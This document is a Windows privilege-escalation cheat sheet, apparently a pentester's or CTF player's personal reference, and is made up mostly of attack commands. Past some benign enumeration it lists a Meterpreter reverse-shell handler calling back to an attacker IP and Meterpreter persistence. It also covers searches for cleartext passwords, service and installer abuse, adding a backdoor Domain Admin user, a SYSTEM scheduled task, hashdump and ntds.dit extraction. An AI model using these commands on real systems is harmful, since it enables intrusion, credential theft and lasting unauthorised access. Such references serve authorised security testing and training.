S1REN's Windows Privesc

  • Windows Privilege Escalation - Resources
    • Initial Enumeration

      • Domain Enum (if joined)
        • BloodHound / SharpHound
      • Whoami
        • whoami
        • echo %username%
      • Privileges
        • whoami /priv
      • System Info
        • systeminfo
        • wmic os get Caption,CSDVersion,OSArchitecture,Version
      • Services
        • wmic service get name,startname
        • net start
      • Admin Check
        • net localgroup administrators
        • net user
      • Network
        • netstat -anoy
        • route print
        • arp -a
        • ipconfig /all
      • Users
        • net users
        • net user
        • net localgroup
      • Firewall
        • netsh advfirewall firewall show rule name=all
      • Scheduled Tasks
        • schtasks /query /fo LIST /v > schtasks.txt
      • Installation Rights
        • reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
        • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    • Windows Priv Esc: GitHub Exploits

    • Maintaining Access

      • Meterpreter Reverse Shell Setup
        • msfconsole
        • use exploit/multi/handler
        • set PAYLOAD windows/meterpreter/reverse_tcp
        • set LHOST <attacker_ip>
        • set LPORT <port>
        • exploit
      • Persistence
        • meterpreter > run persistence -U -i 5 -p 443 -r <LHOST>
      • Port Forwarding
        • meterpreter > portfwd add -l 3306 -p 3306 -r <target_ip>
      • System Migration
        • meterpreter > run post/windows/manage/migrate
        • meterpreter > migrate <PID>
      • Execute Payloads
        • powershell.exe "C:\Tools\privesc.ps1"
    • Privilege Escalation Checklist

      • Unquoted Service Paths
        • wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
      • Weak Service Permissions
        • accesschk.exe -uwcqv <service>
        • sc qc <service>
        • icacls "C:\Path\To\Service.exe"
      • File Transfer Options
        • certutil.exe, powershell (IEX), SMB, FTP, TFTP, VBScript
      • Clear Text Credentials
        • findstr /si password *.txt *.xml *.ini
        • dir /s *pass* == *cred* == *.config*
      • Weak File Permissions
        • accesschk.exe -uwqs Users c:\*.* -accepteula
        • accesschk.exe -uwqs "Authenticated Users" c:\*.* -accepteula
      • New Admin User
        • net user siren P@ssw0rd! /add
        • net localgroup administrators siren /add
        • net group "Domain Admins" siren /add /domain
    • Scheduled Task Abuse

      • Enumeration
        • schtasks /query /fo LIST /v > tasks.txt
      • Create System Task
        • schtasks /create /ru SYSTEM /sc MINUTE /mo 5 /tn RUNME /tr "C:\Tools\sirenMaint.exe"
      • Run Task
        • schtasks /run /tn "RUNME"
    • Post Exploit Enumeration

      • Network Users
        • net user
        • net user <target>
        • net localgroup administrators
      • NT Authority Checks
        • whoami
        • accesschk.exe /accepteula MS09-012.exe "whoami"
      • Hash Dump
        • meterpreter > hashdump
      • Exfiltrate
        • ntds.dit
        • Use secretsdump.py or disk capture tools
      • Installer Abuse
        • AlwaysInstallElevated = 1
        • msiexec /i evil.msi
      • Share Enumeration
        • net share
        • net use
        • net use Z: \\TARGET\SHARE /persistent:yes
    • Toolkit / Resources